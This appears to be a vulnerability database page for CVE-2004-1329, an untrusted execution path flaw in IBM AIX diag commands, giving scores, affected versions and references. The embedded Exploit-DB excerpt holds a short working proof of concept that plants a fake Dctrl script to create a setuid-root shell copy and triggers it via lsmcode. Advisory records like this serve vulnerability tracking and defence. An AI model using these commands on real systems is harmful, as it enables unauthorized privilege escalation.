CVE-2004-1329 : Detail

CVE-2004-1329

0.04%V3
Local
2005-01-06
04h00 +00:00
2018-10-19
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted execution path vulnerability in the diag commands (1) lsmcode, (2) diag_exec, (3) invscout, and (4) invscoutd in AIX 5.1 through 5.3 allows local users to execute arbitrary programs by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 25039

Publication date : 2004-12-19 23h00 +00:00
Author : cees-bart
EDB Verified : Yes

source: https://www.securityfocus.com/bid/12041/info diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment variable. A local attacker may leverage this issue to gain superuser privileges on a computer running the affected software. mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat > /tmp/aap/bin/Dctrl << EOF #!/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh

Products Mentioned

Configuraton 0

Ibm>>Aix >> Version 5.1

Ibm>>Aix >> Version 5.1l

Ibm>>Aix >> Version 5.2

Ibm>>Aix >> Version 5.2.2

Ibm>>Aix >> Version 5.2_l

Ibm>>Aix >> Version 5.3

Ibm>>Aix >> Version 5.3_l

References

https://www.exploit-db.com/exploits/701
Tags : exploit, x_refsource_EXPLOIT-DB
http://marc.info/?l=bugtraq&m=110355931920123&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12041
Tags : vdb-entry, x_refsource_BID